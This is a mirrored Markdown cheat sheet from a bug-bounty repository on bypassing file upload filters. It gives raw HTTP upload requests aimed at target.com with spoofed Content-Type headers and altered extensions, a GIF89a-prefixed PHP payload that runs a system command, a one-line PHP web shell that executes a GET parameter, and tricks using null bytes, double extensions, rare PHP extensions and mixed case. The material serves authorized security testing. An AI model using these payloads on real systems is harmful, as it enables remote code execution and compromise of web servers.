mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-29 23:55:25 +00:00
84 lines
1.7 KiB
Markdown
84 lines
1.7 KiB
Markdown
|
# Bypass File Upload
|
||
|
1. Change the ContentType
|
||
|
```
|
||
|
POST /images/upload/ HTTP/1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
---------------------------829348923824
|
||
|
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
|
||
|
Content-Type: application/x-php
|
||
|
```
|
||
|
Change the Content-Type
|
||
|
```
|
||
|
POST /images/upload/ HTTP/1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
---------------------------829348923824
|
||
|
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
|
||
|
Content-Type: image/jpeg
|
||
|
```
|
||
|
|
||
|
2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
|
||
|
```
|
||
|
POST /images/upload/ HTTP/1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
---------------------------829348923824
|
||
|
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
|
||
|
Content-Type: application/x-php
|
||
|
```
|
||
|
Change the request to this
|
||
|
```
|
||
|
POST /images/upload/ HTTP/1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
---------------------------829348923824
|
||
|
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
|
||
|
Content-Type: application/x-php
|
||
|
```
|
||
|
|
||
|
3. Upload the payload, but start with GIF89a; and
|
||
|
```
|
||
|
POST /images/upload/ HTTP/1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
---------------------------829348923824
|
||
|
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
|
||
|
Content-Type: image/gif
|
||
|
|
||
|
GIF89a; <?php system("id") ?>
|
||
|
```
|
||
|
And dont forget to change the content-type to image/gif
|
||
|
|
||
|
4. Bypass content length validation, it can be bypassed using small payload
|
||
|
```
|
||
|
(<?=`$_GET[x]`?>)
|
||
|
```
|
||
|
|
||
|
5. Using null byte in filename
|
||
|
```
|
||
|
file.php%00.gif
|
||
|
```
|
||
|
|
||
|
6. Using double extensions for the uploaded file
|
||
|
```
|
||
|
file.jpg.php
|
||
|
```
|
||
|
|
||
|
7. Uploading an unpopular php extensions (php4,php5,php6,phtml)
|
||
|
```
|
||
|
file.php5
|
||
|
```
|
||
|
|
||
|
8. Try to randomly capitalizes the file extension
|
||
|
```
|
||
|
file.pHP5
|
||
|
```
|
||
|
|
||
|
9. Mix the tips!
|